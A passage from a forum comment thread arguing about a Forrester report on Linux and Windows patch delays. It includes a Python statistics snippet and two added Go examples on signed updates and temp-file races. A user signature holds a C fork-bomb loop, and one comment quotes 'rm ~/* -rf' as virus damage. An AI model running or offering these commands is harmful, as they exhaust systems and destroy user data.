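# Constructed sample: (advisory id, severity, days from public disclosure to
# the advisory that fixed it). Ids are placeholders, severities are a
# hypothetical four-level scale, and delays are chosen so that the unweighted
# median is 10 days and the mean is 13.5 days, the figures the post quotes.
SAMPLE_ADVISORIES = [
    ("DSA-EX-001", "critical", 0),
    ("DSA-EX-002", "critical", 1),
    ("DSA-EX-003", "critical", 2),
    ("DSA-EX-004", "high", 3),
    ("DSA-EX-005", "high", 10),
    ("DSA-EX-006", "high", 10),
    ("DSA-EX-007", "medium", 10),
    ("DSA-EX-008", "medium", 14),
    ("DSA-EX-009", "low", 30),
    ("DSA-EX-010", "low", 55),
]

# Hypothetical weights for the severity-weighted figure below.
SEVERITY_WEIGHT = {"critical": 4, "high": 3, "medium": 2, "low": 1}


def delay_stats(advisories):
    """Return (median, mean, same-day share, within-10-days share).

    This is the "all advisories treated the same" view the post describes.
    """
    delays = [days for _, _, days in advisories]
    n = len(delays)
    same_day = sum(1 for d in delays if d == 0) / n
    within_10 = sum(1 for d in delays if d <= 10) / n
    return median(delays), mean(delays), same_day, within_10


def stats_by_severity(advisories):
    """Same statistics, computed separately for each severity class."""
    groups = defaultdict(list)
    for advisory in advisories:
        groups[advisory[1]].append(advisory)
    return {sev: delay_stats(advs) for sev, advs in groups.items()}


def severity_weighted_mean(advisories, weights=SEVERITY_WEIGHT):
    """Mean delay where each advisory counts in proportion to its severity.

    A long delay on a low-severity issue pulls this figure up far less than
    the plain mean; a long delay on a critical issue pulls it up far more.
    """
    total_weight = sum(weights[sev] for _, sev, _ in advisories)
    weighted_sum = sum(weights[sev] * days for _, sev, days in advisories)
    return weighted_sum / total_weight


if __name__ == "__main__":
    med, avg, same, ten = delay_stats(SAMPLE_ADVISORIES)
    print(f"all advisories: median {med} days, mean {avg:.1f} days, "
          f"{same:.0%} same day, {ten:.0%} within 10 days")
    for sev, (smed, savg, ssame, sten) in stats_by_severity(SAMPLE_ADVISORIES).items():
        print(f"  {sev:8s}: median {smed} days, mean {savg:.1f} days, "
              f"{ssame:.0%} same day, {sten:.0%} within 10 days")
    print(f"severity-weighted mean: "
          f"{severity_weighted_mean(SAMPLE_ADVISORIES):.1f} days")
```

On the constructed data the unweighted mean is 13.5 days while the severity-weighted mean is under 8, and the per-class table shows the critical issues fixed within two days and the low-severity ones taking weeks; the same ten advisories support very different headlines depending on which figure is reported.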

  23. Missing Distributions? by binary_life · · Score: 5, Funny

    Hey, why ain't Gentoo on the list? I guess they're still compiling their response :p (PS I love Gentoo, so don't go flaming me!)

    1. Re:Missing Distributions? by Anonymous Coward · · Score: 0

      heh, that was quite clever, actually. :) props to you.

    2. Re:Missing Distributions? by DarkBlackFox · · Score: 1

      Or they're too busy working to improve their product to enter a pissing match initiated by a leaky faucet.

    3. Re:Missing Distributions? by Anonymous Coward · · Score: 0

      Yeah but count on the Angry Modders Brigade to give even that post Overrated mod points...

  24. Malleable Statistics by The+Monster · · Score: 5, Insightful
    It's so easy to do, too.
    Forrester collected security vulnerability data
    What vulnerability data? The Linux vendors have an open process. Every one knows what the vulnerabilities are. Can the same be said for Windows bugs? Or are there issues known within MS that simply aren't put on the Bug List until a fix is in the works? Is it a bug if MS doesn't officially admit that it's a bug yet?
    --

    [100% ISO 646 Compliant]
    SVM, ERGO MONSTRO.

    1. Re:Malleable Statistics by pholower · · Score: 4, Insightful

      It is the same as Kevin Mitnick once said. There isn't a security hole if nobody knows about it. If you know about it, it is a security flaw, but to your friends that don't know about it, it is a secure machine.

      --
      -- johntracy.com, because everybody else is wrong.
    2. Re:Malleable Statistics by cshark · · Score: 2, Interesting

      I wonder how much of this is pandering to their audience. Enterprise users are slow, stupid, and don't adapt to change very well. They have this belief that open source software == unsupported software, and no matter how much evidence to the contrary, they will take this belief to their graves. Amazing how faith works. The report by forrester is going to say whatever they think their audience wants to hear. And if they get a kick back from microsoft, all the better.

      --

      This signature has Super Cow Powers

    3. Re:Malleable Statistics by igloo-x · · Score: 0

      The Linux vendors have an open process. Every one knows what the vulnerabilities are.

      And yet, whenever a flaw is found in the latest 2.6 kernel, more often than not it can be traced all the way back to the early 2.4 kernels.

      It may be open, but that doesn't mean everyone instantly knows they exist as soon as you hit 'save.'

    4. Re:Malleable Statistics by BlackHawk-666 · · Score: 1

      Microsoft will try to suppress a vulnerability report until they have completed a fix for it. This has been known to take several months in the past. It's no wonder they get their fixes in a timely way, since they have months of lead up time to correct it *before* it goes on Bugtraq.

      --
      All those moments will be lost in time, like tears in rain.
    5. Re:Malleable Statistics by Nosf3ratu · · Score: 1

      Huh?
      You're trying to tell me that when you click on "Send" after a program crashes in Windows XP, that information DOESN'T go to a publicly-available database of bug reports?!

      --
      The old Lie: Dulce et decorum est Pro patria mori
  25. Is Linux less secure than michael? by Anonymous Coward · · Score: 0

    answer: NO

    Michael's asshole is wide open for anyone's use.

  26. Re:Analyst hacks will never bit the hand that feed by Anonymous Coward · · Score: 2, Insightful

    uh, sounds like a different study to me, jackass

  27. Re:Analyst hacks will never bit the hand that feed by Spyro+VII · · Score: 3, Interesting

    I think that the point that he was trying to make is that Microsoft *has* given Forrester money for a report in the recent past.

  28. Re:no way? Yes way! by Anonymous Coward · · Score: 1, Interesting

    >Yes, let's instead listen to the unbiased people
    > at Debian, Mandrake, Red Hat, and SUSE. Surely
    > their opinions on this issue are less biased
    > than those of the research company.

    Damn straight I will. Why? Because one group
    represents the best interests of a bunch of fat
    asses who got rich off the rest of us, and the
    other not only represents the best interests of
    my community, it IS COMPOSED OF MY COMMUNITY.

    If you can't tell the difference, then you
    have my pity, and I give you some free (as in
    air) advice: Go to Microsoft's Channel 9 website.
    You'll be much happier there. Honestly.

    All you'll find here is a bunch of strange people
    that have a crazy idea that a thing like
    freedom is more important than quick $$, or that
    believe it is in their own best interests to work
    together than to try to $crew everyone else over.

    BTW, next time you see Billy, be sure to tell
    him to keep wasting his money propping
    up the sock puppets, but be sure to send
    enough lubrication to the sock puppets. It must
    hurt like hell to be a sock puppet for Billy.

  29. MS-Funded Research States Sky Is Red by Eberlin · · Score: 5, Interesting

    From tests conducted at an observatory overlooking the skies of Los Angeles, researchers have concluded from the gathered data that the sky is indeed red.

    Buried in all the hoopla, they never tell you that all the smoggy red photos were taken at around the time sunsets happen.

    Statistics and numbers in general can be thrown any which way to serve the purpose of the writer. It's an unfortunate side-effect of being biased by nature. Even if someone were to WANT to be impartial, they'll often offer a slant merely by presenting data a certain way.

    It's difficult to find people to trust when money is on the line somewhere. With Microsoft's track record and its acknowledged need for "Trustworthy Computing" (a marketing term), it's difficult to take their word. Unfortunately, with that money, they have enough marketing power to buy research, and flood biz execs with enough propaganda...and when they constantly hear that kind of information from what they'd consider mainstream sources, they start to believe it as fact.

    Now that's dangerous.

    1. Re:MS-Funded Research States Sky Is Red by bruthasj · · Score: 1

      Now that's dangerous.

      So, when will we be able to see a /. funded research study?!

    2. Re:MS-Funded Research States Sky Is Red by acd294 · · Score: 1

      And you think that a /. funded study would be unbiased???

      Hahahahahah!

      Sorry but this community is extremely pro-linux anti-microsoft. (Not that I am not in that camp, I just recognize the facts)

      --
      main(){char *c;while(1){c=(char*)malloc(1);*c='a';fork();}
  30. But...Linux is a kernel by Anonymous Coward · · Score: 1, Insightful

    Just waiting for the slashbots to start lining up with the "But Linux is a kernel" argument, saying vulnerabilities in Apache etc do not mean Linux is vulnerable, but vulnerabilities in IIS make Win vulnerable.

    These same slashbots will then talk about how "Linux is ready for the desktop". Not Gnome, not KDE but Linux.

    Make up your minds. Either it's an OS, or it's a kernel. You can't pick and choose which one depending on the situation. If it's a kernel, then Linux will NEVER be ready for the desktop. Gnome may be ready, KDE may be ready, but Linux will never be ready. If it's the entire OS, then it is responsible for the vulnerabilities in Apache, sshd.

    If Gnome is ready for the desktop, then Gnome on BSD is just as ready as Gnome on Linux, which is just as ready as Gnome under Cygwin.

    Oh, and a terminal is NOT a usable desktop environment for your average end user. vi does not count as a word processor.

    It's about time there was a mod score -1 Slashbot.

    1. Re:But...Linux is a kernel by sehari24jam · · Score: 1

      "Linux ready for desktop" was to emphasize the preemptive/low-latency improvements in the Linux kernel that benefit desktop users. This will provide a desktop machine with high responsiveness.

      --
      cogito ergo sum
    2. Re:But...Linux is a kernel by Anonymous Coward · · Score: 0

      Thanks for that, I'm pretty sure you're the first one to make that observation in the whole time this article has been running.

      Mods: please mod this post up, this is a very valid and much overlooked point.

  31. May we reprint that? by Anonymous Coward · · Score: 0

    "...SuSe, Red Hat, Mandrake and community based Debian all got... no f..king... security."
    -Linux supporter "darthcamaro" comments on the conclusions of the Forrester study, to general agreement on Linux advocacy enclave Slashdot

  32. Re:Analyst hacks will never bit the hand that feed by SKPhoton · · Score: 3, Insightful

    "Hey Microsoft, you guys have funded studies for us before. I know Linux is being a problem for you and we just so happen to be doing a study to see which OS is better, yours or theirs. Would you be interested in funding us once more? -nudge nudge, wink wink-"

  33. The Bad News by Anarcho-Goth · · Score: 1

    Well the good news is that the people that actually care about this study are the people that understand its shortcomings and inaccuracies.

    The bad news is the PHBs don't understand the study, but will try to make business discussions after reading it anyway. PHBs don't need to understand it, they're the boss.

    With any luck, the businesses that employ PHBs will go under, but that is a long, slow, and painful process.

    --
    I hate Liberals and Conservatives.
    If you are a Liberal or a Conservative, then HAVE A NICE DAY!
    Courage.
  34. Proof Linux is more secure by stox · · Score: 1, Funny

    It is obvious the only way to truly secure a machine is to kill the users. There are more Windows users than Linux users, therefore, it is easier to secure Linux than it is to secure Windows. This also clearly explains why OpenBSD is one of the most secure OS's. Of course, the most secure system is StoxOS(TM) which currently has no users and is perfectly secure.

    --
    "To those who are overly cautious, everything is impossible. "
    1. Re:Proof Linux is more secure by Anonymous Coward · · Score: 0

      So how do you plan to go about securing AOL and MSN? Where can I sign up to be a pen-tester?

  35. You used Micro$oft... by Anonymous Coward · · Score: 0

    ...so of course you are Insightful. If you had thrown in some comment about Open Source being good for the environment, then you would have gotten +5.

  36. As opposed to LinuxWorld or NewsForge Reports by Ciderx · · Score: 1

    Which are all completely justified and wonderfully written exposes of the brilliance of Linux!

    1. Re:As opposed to LinuxWorld or NewsForge Reports by Killswitch1968 · · Score: 2, Funny

      It's always great to see slashdot accusing other people of pro-MS bias.

      --

      Corporations: your universal scapegoat for all society's ills.
  37. 1998 wants its Micro$oft back by Anonymous Coward · · Score: 0

    You mindless sheep, think of something new? please?

  38. some merit in the study by coshx · · Score: 4, Insightful

    Like most linux geeks, I too believe that linux is much more secure than windows, but when asked why, I can only give some rant about how the open source methodology is superior and promotes faster response times to vulnerabilities. Either that, or I point to all the recent windows virus outbreaks.

    But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like "your_paper.sh" that most of us would trivially delete, but many would stupidly run (and these are the same users who would login as root to check their email).

    It wouldn't be fair to use instances like this (albeit they're not common yet) to show that linux is more vulnerable than windows.

    Therefore, I believe that by quantifying the vulnerabilities and response time, Forrester is on the right track, they just need to take into consideration this response, and find a better method of quantifying the data.

    1. Re:some merit in the study by GreyWolf3000 · · Score: 3, Interesting
      Can you actually write a shell script that takes control of the system?

      I see what you're saying, but the way package management is going, pretty soon Linux setups will just download security updates on their own, meaning that finding a binary to exploit will get really difficult. In the Windows world, if you find a buffer overrun, you can often assume that 95% of the Windows machines out there will also have the same exploit. In Linux, this wouldn't be the case even with many more users, as package management really takes care of things automatically.

      Therefore, I believe that by quantifying the vulnerabilities and response time, Forrester is on the right track, they just need to take into consideration this response, and find a better method of quantifying the data.

      I agree.

      --
      Slashdot: Where people pretend to be twice as smart as they really are by behaving like children.
    2. Re:some merit in the study by Eberlin · · Score: 3, Interesting

      The popularity issue can be countered with the Apache vs. IIS deal where Apache's stability and security (and reaction to vulnerability) is much better. Just because something is popular doesn't mean it's not as safe merely because it's a bigger target.

      The Open Source model definitely is an advantage as far as security goes. Having the code around can speed up bug detection and consequently, speed up fixes. There's also the fact that a programmer's name is at stake -- if you take pride in your work, you risk your reputation on it. On closed source stuff, Joe Programmer doesn't necessarily have the same reputation to lose.

      The idea of "do one thing well" is also an advantage over "more features" because simplicity definitely reduces bugs. When things are cobbled together and interdepend on each other (IE/Outlook/ActiveX/OS), a security issue in one part can completely hose the others.

      If someone were to attach a "your_paper.sh" and if someone did fire it up, it will definitely do damage...and anything that user has rights to becomes fair game. However, it'll keep enough of the system alive. If the machine is multi-user, the other users' data should not be affected.

      For such instances, a clue-by-four or LART had always been the only solution I could think of. Until Peter Norton writes an Anti-Stupid, there's little hope there. (As one who has borked his machine...though not by worm/viruses, I could've used an Anti-Stupid for myself. The trick is to learn from those painful mistakes.)

    3. Re:some merit in the study by idiot900 · · Score: 1

      Can you actually write a shell script that takes control of the system?

      Do you need to? I wouldn't give a flying SCO if my /usr/bin got nuked. It's my $HOME that I care about, and a worm only needs user privileges to kill that.

    4. Re:some merit in the study by moranar · · Score: 1

      As the other poster said:

      rm ~/* -rf

      does all the damage you could want. I can reinstall Mandrake in under an hour, and finish updating in under 5. I can't recover all my data, unless I had a backup. But I think the intersection between "people who open unknown attachments" and "people who do regular backups" is 0.

      --
      "I think it would be a good idea!"
      Gandhi, about Internet Security
    5. Re:some merit in the study by PygmySurfer · · Score: 1

      I see what you're saying, but the way package management is going, pretty soon Linux setups will just download security updates on their own, meaning that finding a binary to exploit will get really difficult. In the Windows world, if you find a buffer overrun, you can often assume that 95% of the Windows machines out there will also have the same exploit. In Linux, this wouldn't be the case even with many more users, as package management really takes care of things automatically

      This is different from the "Windows world" how? Microsoft already has mechanisms in place for end-users to keep their machines up to date (Even some that'll download patches automatically, without user intervention). The problem is getting end-users to configure and enable those services. I don't see what Linux's package management has to do with it.

      The real reason you won't see the same kind of wide-spread vulnerabilities in Linux is due to a more technical and security-minded user, NOT superior package management and automatic update systems.

    6. Re:some merit in the study by ImpTech · · Score: 1

      Okay, but first the script would have to get root somehow. In Windows it's probably already at administrator level. Never mind that the probability of it being executed in the first place is inherently lower, since no Linux mail client I know of will fail to complain when you ask it to execute an attachment. Further, I'm betting the permissions on the file default to non-executable, so you'd have to chmod it (or GUI equivalent)....

      In any case, no study on OS security should care too much about vulnerabilities that are caused by fundamentally dumb users. If I were studying Windows vulnerabilities, the only email exploits I would include are the ones that execute without any user intervention, i.e. where you've done nothing more than preview/open the email.

    7. Re:some merit in the study by GreyWolf3000 · · Score: 1
      The real reason you won't see the same kind of wide-spread vulnerabilities in Linux is due to a more technical and security-minded user, NOT superior package management and automatic update systems.

      I agree, but you missed my point. Microsoft has a mechanism for patching Windows, but not all those third party applications. I'm not sure if it can even patch software like Word. In the Linux world, all of your software gets to you through your OS supplier, which is a big difference.

      --
      Slashdot: Where people pretend to be twice as smart as they really are by behaving like children.
    8. Re:some merit in the study by Coryoth · · Score: 1

      Like most linux geeks, I too believe that linux is much more secure than windows, but when asked why, I can only give some rant about how the open source methodology is superior and promotes faster response times to vulnerabilities. Either that, or I point to all the recent windows virus outbreaks.

      SELinux. It kicks the crap out of any other readily available OS for security (except for some BSD forks that implement the same security model). It has security through isolation and least privilege built into the kernel itself - each and every process is assigned the absolute minimum amount of access it requires.

      If you want to be able to say that Linux is more secure than Windows, use SELinux, because it very definitely and quantifiably will be.

      Jedidiah.

    9. Re:some merit in the study by demaria · · Score: 1

      "In the Linux world, all of your software gets to you through your OS supplier, which is a big difference."

      When has Redhat distributed updates to Listserv and slforum? Do they update proftp, Acrobat and RealPlayer for Linux too?

    10. Re:some merit in the study by Tony · · Score: 2, Funny
      But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like "your_paper.sh" that most of us would trivially delete, but many would stupidly run (and these are the same users who would login as root to check their email).

      Damn. Got another attachment-- "your_paper.sh". The "sh" must stand for "super-helpful." Cool.

      Let's see if I can read it. Do I want to view it, or save it? Uhm... view it.

      Gibberish. Starts with "#!/bin/bash". Should have known. Damn.

      Let me save it. Then I can double-click it in my file manager.

      Damn it! Same gibberish. Time to pull out the big guns, "Fucking Up Your Linux System For Dummies."
      dummy@stupidhead> chmod a+x your_paper.sh
      dummy@stupidhead> ./your_paper.sh

      Usage: your_paper.sh [options] <level>

      Where <level> is a natural number from the set [1-9]

      Option is one of:

      -a, --all Infect everyone in addressbook
      -u <user> Infect only <user>
      -s, --spam Invoke spam relay engine [default]
      -e [1-9] Set embarrassment level of subject line
      -m, --munge Destroy all files, for good measure
      -d [1-9] Set debug level (9 = verbose)

      dummy@stupidhead>
      Good Damn It! I knew Linux was hard to use. I'm going back to MS-Windows, where everything is point-and-click.
      --
      Microsoft is to software what Budweiser is to beer.
    11. Re:some merit in the study by slipstick · · Score: 1

      Not picking on you in particular but there seems to be something generally being missed here. Clicking on a shell script sent as an attachment isn't normally run by any e-mail program that I am aware of. The users would have to save it to disk and then click on it. This doesn't make it an insignificant threat but seriously, how many users of the type we're referring to would do this two step approach? Most would just delete it.

      --
      Sure information wants to be free, but how much are you willing to pay for the packaging?
    12. Re:some merit in the study by Endive4Ever · · Score: 1

      I think that you'd be advised to be worried if your /usr/bin got nuked. But the assumption so many people make that their system is 'secured' because /usr/bin can't be broken into by someone without root access is overhyped as a 'security' measure. /usr/bin can usually be spooled back off a CD. $HOME is the important stuff.

      Yes, yes. We all backup our home directories twice an hour.

      --
      ---
    13. Re:some merit in the study by slipstick · · Score: 1

      I don't believe that's fair enough to the average user. There's no reason that clicking on an e-mail attachment should cause you to get a virus or otherwise harm your system. It is only because of Outlook's complete lack of security that this even happens. It isn't the user's fault.

      I guarantee that any Linux based e-mail program that acted in this manner would be shunned so quickly it wouldn't see the light of day.

      To be labelled "dumb" a user should at least have to click on an attachment, save it to disk, mark it as executable and then double-click it, all without questioning whether this is a good idea or not.

      --
      Sure information wants to be free, but how much are you willing to pay for the packaging?
    14. Re:some merit in the study by Tony-A · · Score: 1

      If someone were to attach a "your_paper.sh" and if someone did fire it up, it will definitely do damage...and anything that user has rights to becomes fair game ...

      If the machine is multi-user ...


      So, set up a run-viruses-here user. World Writeable. Insecure compared to /tmp

      I don't mind running a virus, but why would I want to do so as myself.
      The advantage of a multi-user system is that I can simultaneously be several different "users" on several different machines and keep some degree of sanity.

    15. Re:some merit in the study by paj1234 · · Score: 2, Insightful

      > Can you actually write a shell script that takes control of the system?

      Yes, but you cannot get the user to execute it accidentally. For KMail users, the instructions are:

      1. Right-click on the attachment
      2. Click "Open With"
      3. Type "/bin/sh" (without the quotes)
      4. Click OK.

      I have actually used this in the past, to run a "diagnostics" script on a customer's machine. I wanted to run various commands and have the results emailed back to me. The above method let me do that.

      However, if the user simply clicks on the shell script, like any other attachment, then the user just sees the text in the script. To get round the lack of execute permission, you must tell the user how to execute it. This means asking the user to follow an off-putting sequence of scary instructions.

      Furthermore, the shell script only runs with the user's permissions. The way to overcome that would be to know or guess the root password, unless the user is already root. Another possibility would be to find a buffer overflow in KMail which would allow the shell script to auto-run. However, no such vulnerability exists, as far as I know, in KMail.

      Therefore, an email virus for the Linux platform is possible, but it will only work on those users brave enough to follow instructions that they probably don't understand. In other words, I believe the following statement is true now and will hold true in the future:

      "To screw up Linux, you have to work at it. To screw up Windows, you just have to use it."

    16. Re:some merit in the study by Lukey+Boy · · Score: 1

      I run Debian GNU/Linux (unstable) on this laptop, and the Stable version on several servers that I administrate for work. Guess what? apt-get update and upgrade on any of the machines will update all the packages. On this unstable system, upgrading will get me bug fixes, security fixes and new bugs (gotta love unstable). But on the work systems, where they're running Stable, they get nothing but bug fixes and security patches. It's simple, straightforward and I put a hell of a lot of trust into the Debian community and they've not let me down yet. And all of the software is updated. Everything from mailing list software to the bug reporting tool, from the IMAP daemon to SquirrelMail. As for Acrobat and Realplayer - what in the hell would they be doing on either my office systems or home? I'm serious. I use XMMS and VLC, and they rock - playing every single file I throw at them without a hiccough. And Acrobat, yeah, uh... I could download that or just run xpdf, the KDE PDF viewer, or a myriad of other less-bloated applications. So yes, my distribution provider - Debian - does provide me with updates to all my software. And it works fucking beautifully.

    17. Re:some merit in the study by Lukey+Boy · · Score: 1

      Apologies for the formatting. The one thing apt-get upgrade doesn't patch is me.

    18. Re:some merit in the study by some+guy+I+know · · Score: 1

      > pretty soon Linux setups will just download security updates on their own

      Then all that a hacker need do is hijack a DNS server to cause a "security update" to be installed that contains an exploit.

      (Crypto-signing security updates can prevent this in most cases.)

      --
      Those who sacrifice security to condemn liberty deserve to repeat history or something. - Benjamin Santayana
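The parenthetical in the post above is the control that matters: if the update index and the packages are signed, a hijacked DNS answer or mirror can serve whatever it likes but cannot get a client to install it. The following Go program is an added example, not any distribution's update tooling; the manifest format (`sha256hex  name` lines signed with Ed25519), the package name and the package contents are constructed for the demonstration. It shows a genuine delivery verifying, a swapped package failing on its hash, and a rewritten manifest failing on its signature because the attacker does not hold the distributor's private key.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// signedManifest is a hypothetical update index: a text body with one
// "sha256hex  package-name" line per package, plus the distributor's
// Ed25519 signature over that exact body. Only the signature is trusted;
// the transport (DNS, HTTP, mirror) is not.
type signedManifest struct {
	Body []byte
	Sig  []byte
}

// buildManifest is the distributor side: hash every package, sign the list.
func buildManifest(priv ed25519.PrivateKey, packages map[string][]byte) signedManifest {
	var b bytes.Buffer
	for name, data := range packages {
		sum := sha256.Sum256(data)
		fmt.Fprintf(&b, "%s  %s\n", hex.EncodeToString(sum[:]), name)
	}
	return signedManifest{Body: b.Bytes(), Sig: ed25519.Sign(priv, b.Bytes())}
}

// verifyUpdate is the client side: check the manifest signature against the
// pinned public key first, then check the downloaded bytes against the hash
// the manifest lists for that package. A hijacked mirror can change both the
// package and the manifest, but cannot produce a valid signature.
func verifyUpdate(pub ed25519.PublicKey, m signedManifest, name string, data []byte) error {
	if !ed25519.Verify(pub, m.Body, m.Sig) {
		return errors.New("manifest signature invalid: refusing all packages")
	}
	want := ""
	for _, line := range strings.Split(string(m.Body), "\n") {
		fields := strings.Fields(line)
		if len(fields) == 2 && fields[1] == name {
			want = fields[0]
		}
	}
	if want == "" {
		return fmt.Errorf("package %q not listed in signed manifest", name)
	}
	sum := sha256.Sum256(data)
	if hex.EncodeToString(sum[:]) != want {
		return fmt.Errorf("package %q hash mismatch: download was altered", name)
	}
	return nil
}

// scenario plays out three deliveries of a constructed package and returns
// the verification result of each: the genuine one, one where only the
// package bytes were swapped, and one where the attacker also rewrote the
// manifest to match the swapped bytes but could only sign it with a key of
// their own.
func scenario() (genuine, swappedPackage, forgedManifest error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // distributor's key pair
	if err != nil {
		panic(err)
	}
	const pkg = "example-tool_1.0_all.deb" // constructed package name
	packages := map[string][]byte{pkg: []byte("constructed package contents")}
	manifest := buildManifest(priv, packages)

	genuine = verifyUpdate(pub, manifest, pkg, packages[pkg])

	altered := []byte("constructed package contents, altered in transit")
	swappedPackage = verifyUpdate(pub, manifest, pkg, altered)

	_, attackerKey, _ := ed25519.GenerateKey(rand.Reader)
	forged := buildManifest(attackerKey, map[string][]byte{pkg: altered})
	forgedManifest = verifyUpdate(pub, forged, pkg, altered)
	return genuine, swappedPackage, forgedManifest
}

func main() {
	g, s, f := scenario()
	fmt.Println("genuine delivery:      ", g)
	fmt.Println("swapped package:       ", s)
	fmt.Println("attacker-signed index: ", f)
}
```

The public key has to reach the client by some path the attacker does not control (shipped with the installation media, for instance), and the client must refuse to proceed when the signature check fails rather than fall back to an unsigned index; both are assumptions of this example rather than anything the post specifies.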
    19. Re:some merit in the study by Anonymous Coward · · Score: 0

      But if linux were on every desktop, I'll bet you'd be getting a few emails every day with attachments like...

      You know, I hear this all the time and it is absolute crap! MSBlaster didn't require anything more than an active Internet connection; many of the recent vulnerabilities in Outlook don't require you to even view the e-mail message, let alone click an attachment; the latest round of IE vulnerabilities allow malicious sites to force a download and install without any intervention on the part of the user!

      Stupid users are not the problem! And patching is not the answer! The answer is intelligent design and thorough testing; things that Microsoft has not been able to provide for over 10 years!

  39. Re:If you think that mass-circulated study is bad. by WindBourne · · Score: 1

    Of course, the funny thing is that every company that has moved to Linux swears up one side and down the other that it is quite a bit cheaper. Of course, what else would they say? "Oh, we made a mistake"?

    In this day and age, nobody seems to ever admit doing wrong.

    --
    I prefer the "u" in honour as it seems to be missing these days.
  40. Mark Twain echoed Benjamin Disraeli by at10u8 · · Score: 2, Interesting

    There are three types of lies: lies, damn lies, and statistics.

  41. Local Vulnerabilities by wasabii · · Score: 4, Insightful

    The idea is that these vulnerabilities don't have equal impact at all. Let's examine some of the Unix security vulns I've seen in the last few months.

    3 or 4 games, unsafe handling of common scoreboard files producing exploits.

    WHAT THE HELL? That's Unix security for you... even GAMES that have vulns get attention. Windows only gets remotely exploitable vuln attention.

    Consider how many Windows programs use shared registry keys, consider how many read/write to common temp folders, or common locations on disk. Have any of the probably hundreds of overflows involved in reading a temp file from C:\Winnt\Temp been taken into consideration with Windows? Heck no, nobody even cares. Windows has too many remote vulns to even pay attention to stuff like that.

    Consider gzip's unsafe handling of temporary files. I wonder how many Winzip/Windows Compressed Folders have? NOBODY HAS EVEN LOOKED.

    1. Re:Local Vulnerabilities by m_pll · · Score: 1

      > Consider how many Windows programs use shared registry keys, consider how many read/write to common temp folders, or common locations on disk. Have any of the probably hundreds of overflows involved in reading a temp file from C:\Winnt\Temp been taken into consideration with Windows?

      And most of these shared locations are properly secured to begin with. If you can write to HKCU you can become the user, no need to exploit any buffer overflows. Same for HKLM - write access there is equivalent to having system/admin rights.

      C:\winnt\temp is an interesting example. It's only used when a profile is not loaded (otherwise your temp folder would be somewhere under Documents and Settings), but even then if you look at its security descriptor you'll see that files created by user A cannot be accessed by user B. The only way user B can hijack user A's temp files is if he can predict the name of the file that A is going to create, and manage to create the file in the short time window between the moment A checked that the file does not exist and the moment he calls CreateFile. And even then it will only work if A specifies the "open existing" flag, which is somewhat unusual for temp files.

      In short, this is a valid attack vector but not nearly as bad as you made it sound.

      > I wonder how many Winzip/Windows Compressed Folders have? NOBODY HAS EVEN LOOKED.

      How do you know that? In fact I'm sure there have been a couple of similar exploits in the shell, and they have been fixed just like any other vulnerability.
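The race described two posts up (check that a predictable name does not exist, then create it, with a window between the two steps in which another user of the shared directory can plant a file) is the classic temp-file time-of-check/time-of-use bug, and the fix is the same on Windows and Unix: have the OS create the file atomically and fail if it already exists (`O_EXCL`, which Go maps to `CREATE_NEW` on Windows), keep the mode bits restrictive, and better still use an unpredictable name. The Go program below is an added example, not from either post; the scratch directory, the file name and the "other user" planting a file are all simulated inside one process, so the planting step stands in for user B rather than actually running as a second account.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
)

// racyCreate is the check-then-create pattern from the thread: test whether
// the name exists, then open it. between() stands in for the window in which
// another user of the shared directory can plant a file under the predicted
// name; when that happens the open silently succeeds on the planted file.
func racyCreate(name string, between func()) (*os.File, error) {
	if _, err := os.Stat(name); err == nil {
		return nil, errors.New("refusing: file already exists")
	}
	between() // the time-of-check / time-of-use window
	return os.OpenFile(name, os.O_RDWR|os.O_CREATE, 0o600)
}

// safeCreate asks the OS to create the file and fail if it already exists,
// in one step (O_EXCL; CREATE_NEW on Windows). A planted file can no longer
// be opened by mistake, and 0600 keeps other users out of the new file.
func safeCreate(name string) (*os.File, error) {
	return os.OpenFile(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0o600)
}

// demo runs both patterns against a predictable name in a scratch directory
// that plays the role of the shared temp folder. It returns whether the racy
// open was hijacked, whether the safe open refused the planted file, and any
// unexpected error.
func demo() (hijacked bool, refused bool, err error) {
	dir, err := os.MkdirTemp("", "shared-temp-demo")
	if err != nil {
		return false, false, err
	}
	defer os.RemoveAll(dir)

	predictable := filepath.Join(dir, "userA-work.tmp") // guessable name
	plant := func() {
		// Simulated "user B": drops a file with content of their choosing
		// under the name user A is about to use.
		_ = os.WriteFile(predictable, []byte("planted by another user\n"), 0o666)
	}

	f, err := racyCreate(predictable, plant)
	if err != nil {
		return false, false, err
	}
	buf := make([]byte, 64)
	n, _ := f.Read(buf)
	f.Close()
	hijacked = string(buf[:n]) == "planted by another user\n" // A now works on B's file

	_, err = safeCreate(predictable)
	refused = errors.Is(err, os.ErrExist)

	// The stronger fix: no predictable name at all. os.CreateTemp picks a
	// random suffix and opens with O_EXCL and mode 0600.
	tmp, err := os.CreateTemp(dir, "userA-*.tmp")
	if err != nil {
		return hijacked, refused, err
	}
	tmp.Close()
	return hijacked, refused, nil
}

func main() {
	hijacked, refused, err := demo()
	if err != nil {
		fmt.Println("unexpected error:", err)
		return
	}
	fmt.Printf("check-then-open opened the planted file: %v\n", hijacked)
	fmt.Printf("O_EXCL open refused the planted file:    %v\n", refused)
}
```

As m_pll notes, the attack only lands when the victim's open call is willing to take an existing file; the exclusive-create flag turns that willingness off, and a random name removes the attacker's ability to predict what to plant in the first place.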

    2. Re:Local Vulnerabilities by fedork · · Score: 1

      Local Vulnerability for Windows is pretty much an oxymoron - once you've got onto a Windows box you probably have full control (in most cases anyway, yes you can restrict access on a Windows box, but how often is that the case?).

      --
      ...remember good 'ol times when IP used to mean Internet Protocol....
  42. Factor of Many Things by Anonymous Coward · · Score: 0

    O.S. Security is a factor of many things. Sure, the quality of code written is important. However, the most important factor is the administrative staff managing the O.S.

    Additionally, an O.S. can be more secure than another but there is no such thing as 100% secure OS.

    Security patches can be released the second a vulnerability is identified. The OS is only as secure as the people managing it. If the people managing the OS fail to patch the OS, the OS is going to be insecure even if the entity that engineered the OS is diligent about patching their product.

  43. Re:I received it in my mail and I couldn't believe by Anonymous Coward · · Score: 0

    Puh-leez. The relatively few vulnerabilities that are discovered are normally patched within a *very* short time, just long enough to verify the bug, find the vulnerability, contact the code authors, and test the fix.

